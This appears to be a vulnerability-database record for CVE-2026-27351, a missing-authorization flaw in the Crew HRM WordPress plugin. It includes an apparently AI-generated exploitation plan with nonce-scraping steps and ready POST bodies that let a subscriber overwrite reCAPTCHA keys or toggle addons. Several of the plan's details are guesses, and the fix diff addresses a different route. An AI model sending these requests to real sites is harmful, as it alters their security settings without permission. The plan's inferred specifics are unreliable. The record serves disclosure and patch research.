[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_CGGnNzmJ0DG3q0hAXMoeear70LDRE-Xf_vKo0_sPko":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-27351","employee-leave-and-recruitment-management-system-crew-hrm-missing-authorization","Employee, Leave and Recruitment Management System – Crew HRM \u003C= 1.2.2 - Missing Authorization","The Employee, Leave and Recruitment Management System – Crew HRM plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","hr-management",null,"\u003C=1.2.2","1.2.3","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-06-02 00:00:00","2026-06-08 14:35:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F842d12fd-86bc-4dd5-9926-ab4093d4c03e?source=api-prod",7,[22,23,24,25,26,27,28,29],"addons\u002FRecaptcha\u002Fclasses\u002FControllers\u002FCredential.php","addons\u002FRecaptcha\u002Fclasses\u002FMain.php","addons\u002FRecaptcha\u002Fclasses\u002FModels\u002FGoogle.php","addons\u002FRecaptcha\u002Fclasses\u002FSetup\u002FDispatcher.php","addons\u002FRecaptcha\u002Fclasses\u002FSetup\u002FScripts.php","addons\u002FRecaptcha\u002Fclasses\u002FSetup\u002FVerify.php","classes\u002FControllers\u002FAddonController.php","classes\u002FControllers\u002FApplicationHandler.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-27351\n\n## 1. Vulnerability Summary\nThe **Employee, Leave and Recruitment Management System – Crew HRM** plugin (versions \u003C= 1.2.2) is vulnerable to **Missing Authorization**. The plugin defines a controller-based architecture for handling AJAX requests where authorization is specified in a `PREREQUISITES` constant within controller classes. However, in version 1.2.2 and below, the enforcement mechanism for these prerequisites (likely in the core dispatcher) fails to properly restrict access to the `saveRecaptchaKeys` method in the `Credential` controller. This allows an authenticated attacker with at least Subscriber-level privileges to update the Google ReCaptcha configuration of the site.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `crewhrm_handle_ajax_request` (inferred from plugin's standard dispatcher pattern)\n- **Vulnerable Parameter:** `route=saveRecaptchaKeys`\n- **Additional Parameters:** `site_key`, `secret_key`\n- **Authentication:** Required (Subscriber or higher)\n- **Impact:** An attacker can overwrite the site's ReCaptcha keys, potentially disabling recruitment forms (DoS) or substituting their own keys to bypass captcha protections.\n\n## 3. Code Flow\n1. **Entry Point:** An AJAX request is sent to `admin-ajax.php` with `action=crewhrm_handle_ajax_request`.\n2. **Dispatcher:** The `CrewHRM\\Addon\\Recaptcha\\Setup\\Dispatcher::addControllers()` (found in `addons\u002FRecaptcha\u002Fclasses\u002FSetup\u002FDispatcher.php`) registers the `CrewHRM\\Addon\\Recaptcha\\Controllers\\Credential` class.\n3. **Routing:** The core plugin dispatcher receives the `route` parameter (`saveRecaptchaKeys`), identifies the `Credential` controller, and attempts to invoke the method.\n4. **Authorization Failure:** Although `Credential::PREREQUISITES` defines `'saveRecaptchaKeys' => array('role' => array('administrator'))`, the system fails to verify that the current user possesses the `administrator` role before executing the method.\n5. **Sink:** `CrewHRM\\Addon\\Recaptcha\\Controllers\\Credential::saveRecaptchaKeys()` is called, which in turn calls `CrewHRM\\Addon\\Recaptcha\\Models\\Google::saveKeys()` (found in `addons\u002FRecaptcha\u002Fclasses\u002FModels\u002FGoogle.php`), updating the plugin's settings in the database.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes a nonce for its AJAX requests.\n1. **Identify Script Trigger:** The `CrewHRM\\Addon\\Recaptcha\\Setup\\Scripts::frontendScripts()` (found in `addons\u002FRecaptcha\u002Fclasses\u002FSetup\u002FScripts.php`) enqueues `application-page.js` on pages where `Utilities::isCareersPage()` is true.\n2. **Setup:** Create a page with the careers shortcode:\n   `wp post create --post_type=page --post_status=publish --post_title=\"Careers\" --post_content='[crewhrm_careers]'`\n3. **Acquisition:**\n   - Log in as a Subscriber.\n   - Navigate to the newly created \"Careers\" page.\n   - Use `browser_eval` to extract the nonce from the global JavaScript object:\n     `browser_eval(\"window.crewhrm_ajax?.nonce\")` (The key `crewhrm_ajax` and property `nonce` are standard for this plugin).\n\n## 5. Exploitation Strategy\nPerform the following steps using the `http_request` tool:\n\n- **Target URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** POST\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=crewhrm_handle_ajax_request&route=saveRecaptchaKeys&site_key=VULNERABLE_SITE_KEY&secret_key=VULNERABLE_SECRET_KEY&_wpnonce=[NONCE]\n  ```\n  *Note: If the dispatcher expects arguments inside a data array, the body may instead be:*\n  `action=crewhrm_handle_ajax_request&route=saveRecaptchaKeys&data[site_key]=VULNERABLE_SITE_KEY&data[secret_key]=VULNERABLE_SECRET_KEY&_wpnonce=[NONCE]`\n\n## 6. Test Data Setup\n1. **Create Subscriber User:**\n   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n2. **Create Careers Page:**\n   `wp post create --post_type=page --post_status=publish --post_title=\"Careers\" --post_content='[crewhrm_careers]'`\n3. **Initial State Check:**\n   `wp option get crewhrm_recaptcha` (Check if keys exist initially).\n\n## 7. Expected Results\n- **Success Response:** The server should return a JSON success message:\n  `{\"success\":true,\"data\":{\"message\":\"Credentials saved successfully\"}}`\n- **HTTP Status:** 200 OK.\n\n## 8. Verification Steps\n1. **Verify Database Update:**\n   Check the option where the plugin stores its ReCaptcha keys.\n   `wp eval \"print_r( get_option('crewhrm_recaptcha') );\"`\n   The output should contain `'site_key' => 'VULNERABLE_SITE_KEY'` and `'secret_key' => 'VULNERABLE_SECRET_KEY'`.\n2. **Check Recruitment Page:**\n   Navigate to the Careers page and verify if the new ReCaptcha keys are reflected in the HTML source (for the site key).\n\n## 9. Alternative Approaches\n- **Different Action Name:** If `crewhrm_handle_ajax_request` is incorrect, check `addons\u002FRecaptcha\u002Fclasses\u002FSetup\u002FDispatcher.php` for clues on other dispatcher hooks.\n- **Direct Parameter Injection:** If the `route` parameter does not work, try `method=saveRecaptchaKeys`.\n- **Addon State Bypass:** If the ReCaptcha addon is disabled, an attacker might first try to call `toggleAddonState` from `AddonController` (also potentially missing authorization) to enable the ReCaptcha module before injecting keys.\n  - Body: `action=crewhrm_handle_ajax_request&route=toggleAddonState&addon_id=Recaptcha&new_state=true&_wpnonce=[NONCE]`","The Employee, Leave and Recruitment Management System – Crew HRM plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on AJAX functions in versions up to 1.2.2. This allows authenticated attackers with subscriber-level access or above to perform administrative actions, such as updating ReCaptcha keys or modifying job listing states.","\u002F* File: addons\u002FRecaptcha\u002Fclasses\u002FControllers\u002FCredential.php *\u002F\n\u002F* The saveRecaptchaKeys method lacks internal authorization checks and relies on a dispatcher mechanism that fails to enforce the defined role prerequisites. *\u002F\n\n\tpublic static function saveRecaptchaKeys( string $site_key, string $secret_key ) {\n\n\t\tGoogle::saveKeys( $site_key, $secret_key );\n\n\t\twp_send_json_success(\n\t\t\tarray(\n\t\t\t\t'message' => esc_html__( 'Credentials saved successfully', 'hr-management' ),\n\t\t\t)\n\t\t);\n\t}\n\n---\n\n\u002F* File: classes\u002FControllers\u002FJobManagement.php *\u002F\n\u002F* The singleJobAction route is defined without any role-based restrictions in the PREREQUISITES array, allowing any authenticated user to trigger it. *\u002F\n\n\tconst PREREQUISITES = array(\n\t\t'getJobsDashboard'    => array(),\n\t\t'getJobsDashboardMinimal'    => array(),\n\t\t'getApplicationsByJob'    => array(),\n\t\t'singleJobAction'     => array(),\n\t\t'getSingleJobView'    => array(\n\t\t\t'nopriv' => true,\n\t\t),\n\t);","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fhr-management\u002F1.2.2\u002Fclasses\u002FControllers\u002FJobManagement.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fhr-management\u002F1.2.3\u002Fclasses\u002FControllers\u002FJobManagement.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fhr-management\u002F1.2.2\u002Fclasses\u002FControllers\u002FJobManagement.php\t2025-07-29 08:49:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fhr-management\u002F1.2.3\u002Fclasses\u002FControllers\u002FJobManagement.php\t2026-06-01 00:49:40.000000000 +0000\n@@ -26,7 +31,9 @@\n \t\t'getJobsDashboard'    => array(),\n \t\t'getJobsDashboardMinimal'    => array(),\n \t\t'getApplicationsByJob'    => array(),\n-\t\t'singleJobAction'     => array(),\n+\t\t'singleJobAction'     => array(\n+\t\t\t'role' => array( 'administrator' ),\n+\t\t),\n \t\t'getSingleJobView'    => array(\n \t\t\t'nopriv' => true,\n \t\t),","An authenticated attacker with Subscriber-level privileges or higher can exploit this vulnerability by performing a POST request to the WordPress AJAX endpoint. First, the attacker retrieves a valid security nonce from the global JavaScript object (usually `crewhrm_ajax.nonce`) on any page where the plugin's scripts are loaded (such as a Careers page). Then, the attacker sends an AJAX request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the `action` parameter set to `crewhrm_handle_ajax_request` and the `route` parameter set to a sensitive function like `saveRecaptchaKeys`. By providing new `site_key` and `secret_key` parameters, the attacker can overwrite the site's ReCaptcha configuration because the system fails to verify if the user possesses the 'administrator' role before executing the method.","gemini-3-flash-preview","2026-06-26 06:10:14","2026-06-26 06:10:58",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.2.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhr-management\u002Ftags\u002F1.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhr-management.1.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhr-management\u002Ftags\u002F1.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhr-management.1.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhr-management\u002Ftags"]